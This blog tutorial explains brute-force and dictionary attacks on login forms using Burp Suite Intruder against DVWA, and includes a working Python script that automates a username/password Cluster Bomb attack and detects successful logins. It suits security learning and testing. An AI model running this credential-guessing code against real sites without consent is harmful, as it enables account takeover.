Following celebrity news is a lot like watching a bad horror movie. You’re constantly wondering why every decision they make is just so stupid. Whether we’re watching Friday the 13th or TMZ, we always end up yelling “No! Stop!” at our screens. We lift our chins up boldly and proclaim “I’d never do such a thing!”. That, or we shrug our shoulders and mumble “Can’t be helped” if something random and extraordinary happens to them. That’s pretty much what I did when a month ago a huge LinkedIn password dump led to hackers gaining access to thousands of Twitter accounts, including Mark Zuckerberg’s, not that he uses his much anyway.
What I’m saying is we think our passwords are very secure, or maybe just secure enough, until it’s too late. This particular hack happened because people tend to reuse the same password everywhere, or at the very least passwords that are very similar, so one breached site hands attackers the keys to the rest. In the case of Mark Zuckerberg, I can only imagine his LinkedIn and Twitter passwords to be Faceb00kRul3z. Reused credentials are not the only way into someone’s account, however. Another very common way is to have a computer try password after password against the login form, either every possible combination of characters (a brute-force attack) or, far more often, a list of common passwords (a dictionary attack), in the hope that one of them matches. Burp Suite’s Intruder is a very effective tool for doing this, just remember to only use it with the consent of the site owner and without malice.
The first thing you’ll want to do is load up Burp Suite and point your browser at its proxy listener (assuming you have it set up already), so that every request you make passes through Burp and gets recorded.
Then, go to the web application you want to break into. Click around on it, or use Burp Spider, until you have enough information on the site or have found the login page you want to attack. As an example, I’ll use DVWA (Damn Vulnerable Web Application), a free, open-source web app made specifically to have its vulnerabilities exploited.
What you want to do now is enter anything into both fields and click login. The point right now is not to guess the password but to capture a baseline login request and see what the response to an invalid attempt looks like, because that is what every failed guess will be compared against. Now open your Burp window, open up the Target tab and the Site map subtab, and find the page and the request that holds your invalid login attempt (it is also listed under Proxy and HTTP history). Right-click on the request and click ‘Send to Intruder’.
Now Burp Intruder can work with the request. Go to the Intruder tab and the Positions subtab. You should see the raw request with some parts highlighted between § markers. That’s Burp letting you know where it found parameters, such as the login fields or a cookie, that it thinks you can work with. Burp marks every parameter by default, so press ‘Clear §’ on the right to remove all of the markers, then select the username value and the password value and press ‘Add §’ for each, leaving everything else (the session cookie in particular) alone. Above the request there’s a drop-down that asks you what attack type you want.
There are four attack types. Sniper uses a single payload set and fuzzes one position at a time: it runs every payload through the first position while the other positions keep their original value, then moves on to the next position, so it is what you want when you only have one piece of the request to break into (a position) and a list of values to throw at it (payloads). Battering Ram also uses one payload set but inserts the same payload into every position at once. Pitchfork uses one payload set per position and walks them in lock-step. For example, if you had two positions and two payload sets, it would enter the first payload from the first set into the first position and the first payload from the second set into the second position, then the second payload from each set into its position, and so on, stopping when the shorter set runs out. Cluster Bomb also uses one payload set per position but tries every combination: it holds one payload in one position while it runs through every payload in the other, then moves to the next payload and runs through them all again, until every pairing has been sent. It does not stop when something matches; you read the hits off the results. This is what we want to use since we don’t know which usernames go with which passwords, so select that.
Now go into the Payloads subtab. The Payload Options section is where you’ll enter the payloads you want used for the set currently selected in the Payload Sets drop-down: set 1 feeds the first position (the username) and set 2 the second (the password). Either type them in by hand, copy and paste them, or, if you have Burp Suite Professional, load one of the built-in lists from the ‘Add from list’ drop-down.
After you’ve got all of that done, you’re ready to fuzz: press Start Attack in the top right corner of the window and your login attempts will show up in the results table one row at a time. Don’t trust the Status column on its own. Which code means what depends entirely on the application: a successful login often redirects (302) while a failure redraws the form (200), but plenty of apps redirect on both outcomes, and some answer 200 to both. Instead, look for the one response that differs from the baseline in its Length column, its Location header, or its body, and in the Options subtab use ‘Grep - Match’ with the application’s own failure message so that every miss is flagged automatically; the row that isn’t flagged is your hit.
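To make the attack types and the result-checking concrete, here is the whole procedure above as a standalone Python script. This is an added example written for this post, not Burp’s code and not DVWA’s: it generates payload combinations in the same order as Intruder’s four attack types, posts each Cluster Bomb pairing to a login form, and classifies each answer by the evidence that actually differs between a hit and a miss rather than by the status code alone. The target is a constructed mock server started on loopback (it redirects on both outcomes, like many PHP login pages, so the status code is useless on its own); the field names `username`/`password`/`Login`, the credentials `admin`/`letmein`, the wordlists, the `login.php` redirect rule and the failure strings in `FAIL_MARKERS` are all assumptions for the example and must be tuned to whatever site you have permission to test.

```python
import itertools
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials for the mock target (an assumption for this example,
# not DVWA's defaults).
MOCK_USER, MOCK_PASS = "admin", "letmein"


class MockLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for a PHP-style login page. It answers 302 on BOTH
    outcomes; only the Location header differs, so status alone can't tell."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        ok = (user, pw) == (MOCK_USER, MOCK_PASS)
        self.send_response(302)
        self.send_header("Location", "index.php" if ok else "login.php")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep per-request logging quiet
        pass


def start_mock_server():
    """Bind the mock on a free loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


# The four Intruder attack types as generators of one tuple per request
# (one value per position), in the iteration order described in the post.
def sniper(base, payloads):
    """One payload set; each position fuzzed in turn, others keep base value."""
    for i in range(len(base)):
        for p in payloads:
            combo = list(base)
            combo[i] = p
            yield tuple(combo)


def battering_ram(n_positions, payloads):
    """Same payload dropped into every position at once."""
    for p in payloads:
        yield (p,) * n_positions


def pitchfork(*payload_sets):
    """Sets walked in lock-step; stops when the shortest set runs out."""
    return zip(*payload_sets)


def cluster_bomb(*payload_sets):
    """Every combination; the first position varies fastest, the last slowest."""
    for combo in itertools.product(*reversed(payload_sets)):
        yield tuple(reversed(combo))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the raw 3xx and its Location survive."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def send_login(url, username, password):
    """POST one attempt; returns (status, Location header, body bytes)."""
    data = urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Location", ""), resp.read()
    except urllib.error.HTTPError as err:  # urllib raises for any 3xx/4xx/5xx
        return err.code, err.headers.get("Location", ""), err.read()


# Assumed failure strings; the Intruder equivalent is a 'Grep - Match' entry.
FAIL_MARKERS = (b"Login failed", b"incorrect")


def classify(status, location, body):
    """Hit or miss from what differs between outcomes, never from status alone."""
    if status in (301, 302, 303):
        # Assumption: a failed login bounces back to the login page itself.
        return "miss" if location.endswith("login.php") else "hit"
    if status == 200:
        return "miss" if any(m in body for m in FAIL_MARKERS) else "hit"
    return "miss"


def run_attack(url, usernames, passwords):
    """Cluster Bomb over username x password against url; returns the hits."""
    hits = []
    for user, pw in cluster_bomb(usernames, passwords):
        status, location, body = send_login(url, user, pw)
        if classify(status, location, body) == "hit":
            hits.append((user, pw))
    return hits


def demo():
    """Start the mock, run a small constructed wordlist attack, tear it down."""
    srv, port = start_mock_server()
    try:
        return run_attack(f"http://127.0.0.1:{port}/login.php",
                          ["admin", "user"], ["password", "letmein", "123456"])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Running `python3 burp_cluster_bomb.py` (the file name is my choice) prints `[('admin', 'letmein')]` after six requests, and `classify` is the part to edit first when you point `run_attack` at a real, authorised target: swap the `login.php` rule and `FAIL_MARKERS` for whatever that application returns on a failed login, exactly as you would set ‘Grep - Match’ in Intruder.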
And that’s it, now you just wait and hope for the best. You may have noticed that most of the passwords in the list are quite similar and predictable, which is exactly what makes a malicious hacker’s job so easy. If you can, change your passwords to something longer and unique to each site (a password manager makes this painless), and if you run a site, rate-limit or lock out repeated failed logins and offer two-factor authentication, because that is what stops an attack like this one cold. You’ll save yourself a world of regret later.